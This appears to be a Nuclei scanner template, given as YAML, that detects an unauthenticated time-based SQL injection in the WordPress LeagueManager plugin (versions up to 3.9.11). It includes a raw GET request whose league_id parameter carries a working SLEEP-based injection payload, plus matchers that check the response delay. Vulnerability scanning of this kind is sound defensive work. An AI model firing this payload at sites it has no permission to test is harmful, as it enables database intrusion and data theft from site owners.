32 lines
1.2 KiB
YAML
32 lines
1.2 KiB
YAML
id: leaguemanager-sql-injection
|
|
|
|
info:
|
|
name: LeagueManager <= 3.9.11 - SQL Injection
|
|
author: theamanrawat
|
|
severity: critical
|
|
description: |
|
|
The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action (available to unauthenticated users), leading to an SQL injection.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/f3be48f5-ae2c-4e27-80ca-664829b8fba3
|
|
- https://wordpress.org/plugins/leaguemanager/
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
tags: time-based-sqli,wpscan,sqli,wp,wp-plugin,wordpress,leaguemanager,unauth
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
@timeout: 10s
|
|
GET /?season=1&league_id=1season=1&league_id=1'+AND+(SELECT+1909+FROM+(SELECT(SLEEP(6)))ZiBf)--+qODp&match_day=1&team_id=1&match_day=1&team_id=1 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'duration>=6'
|
|
- 'status_code == 200'
|
|
- 'contains(content_type, "text/html")'
|
|
- 'contains(body, "LeagueManagerAjaxL10n")'
|
|
condition: and
|
|
# digest: 4a0a004730450221008854c87f786d7562ed948cfff125e48cc80dac58acbbcc078e30ea4fcdf5c9fa022062a1e3aabc4a40164541dd1534275483fa26703b72b95069864b977aef10c6f7:922c64590222798bb761d5b6d8e72950 |